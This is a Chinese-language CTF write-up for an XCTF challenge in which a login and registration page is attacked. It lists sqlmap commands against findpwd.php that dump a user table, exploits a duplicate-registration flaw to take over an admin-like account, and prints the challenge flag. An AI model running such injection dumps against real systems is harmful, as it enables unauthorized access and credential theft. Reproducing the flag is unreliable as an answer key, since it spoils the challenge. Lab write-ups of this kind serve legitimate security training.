難度系數: ★★★★
題目來源: XCTF 4th-CyberEarth
題目描述: 工控云管理系統新添加的登錄和注冊頁面存在漏洞,請找出flag,
題目場景: http://220.249.52.133:52962(溫馨提示:每次進入URL的埠號都不一樣)
1、點擊鏈接進入如下界面
2、先注冊幾個賬號,相同的用戶名
3、登錄—>忘記密碼
4、忘記密碼
5、在kail Linux 里,開始sql注入
執行如下:
5.1
sqlmap ‐u "http://220.249.52.133:52962/findpwd.php" ‐‐data "username=1" ‐dbs
5.2
sqlmap ‐u "http://220.249.52.133:52962/findpwd.php" ‐‐data "username=1" -D cetc004 - -tables
5.3
sqlmap ‐u "http://220.249.52.133:52962/findpwd.php" ‐‐data "username=1" -D cetc004 -T user - -columns
5.4
sqlmap ‐u "http://220.249.52.133:52962/findpwd.php" ‐‐data "username=1" -D cetc004 -T user -C "username,password" - -dump
5.5 OK
有一個沒注冊過的用戶名:c3tlwDmIn23
其密碼經過 md5 加密處理過,但這個用戶的密碼沒有被決議出來,
6、看到有兩個用戶名為 yibodong,并且題目描述中說了注冊頁面有漏洞,再重復注冊一個 c3tlwDmIn23 用戶
7、登錄—>flag就出來了
8、OK
cyberpeace{f3f54fb8f17053c68a7672794dae7e98}
轉載請註明出處,本文鏈接:https://www.uj5u.com/yidong/160862.html
標籤:其他
上一篇:LeetCode 996. 正方形陣列的數目(回溯+剪枝)
下一篇:鏈表看這篇就夠了